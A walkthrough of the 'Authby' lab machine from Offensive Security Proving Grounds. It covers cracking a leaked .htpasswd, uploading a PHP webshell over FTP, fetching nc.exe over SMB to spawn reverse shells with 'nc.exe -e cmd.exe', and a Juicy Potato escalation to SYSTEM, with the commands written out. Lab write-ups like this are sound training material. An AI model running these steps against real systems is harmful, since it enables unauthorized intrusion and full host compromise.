Writeup for Authby from Offensive Security Proving Grounds (PG)

Service Enumeration -H -t full -H -t vulns


Anonymous login allowed.

While we cannot access these files, we can see that there are some account names.

Using the account admin:admin, we get access to some other files.

The .htaccess and .htpasswd files are leaked.


AuthName "Qui e nuce nuculeum esse volt, frangit nucem!"
AuthType Basic
AuthUserFile c:\\wamp\www\.htpasswd
Require valid-user



Passing the .htpasswd hash into John the Ripper, we find the credentials to authenticate into the HTTP server.


Nonstandard Ports


Using the previously found credentials (offsec:elite), we can authenticate into the application.

Subdirectory Enumeration

gobuster dir -u -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite

gobuster dir -u -w /usr/share/dirb/wordlists/common.txt -k -x .txt,.php --threads 50 -U offsec -P elite -s 200,204,301,302,307,401


Using the PHP backdoor from /usr/share/webshells/php/simple-backdoor.php, we can upload this backdoor through the admin FTP account to the web root. Then, we can visit the simple-backdoor.php and use the cmd= parameter to achieve RCE.

Copy nc.exe through SMB: \\\ROPNOP\netcat\nc.exe .

Trigger a reverse shell: -e cmd.exe 443

On our listening machine, we get a reverse shell.

Privilege Escalation

First, we know that SeImpersonatePrivilege is enabled.

We can perform privilege escalation using Juicy Potato.

However, there are two challenges.

  1. This is an x86 system, so we need an x86 Juicy Potato executable. I used the one from here:

  2. The default CLSID doesn't work. Juicy Potato will return COM -> recv failed with error: 10038.

systeminfo shows that this is Windows Server 2008.

We can use one of the BITS CSLIDs from here: I used {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}.

Now, we can use the nc.exe we transferred previously to get another reverse shell, this time with SYSTEM privileges.

juicy.potato.x86.exe -l 1337 -p c:\windows\system32\cmd.exe -a "/c c:\wamp\www\nc.exe -e cmd.exe 443" -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

On our listening machine:

Last updated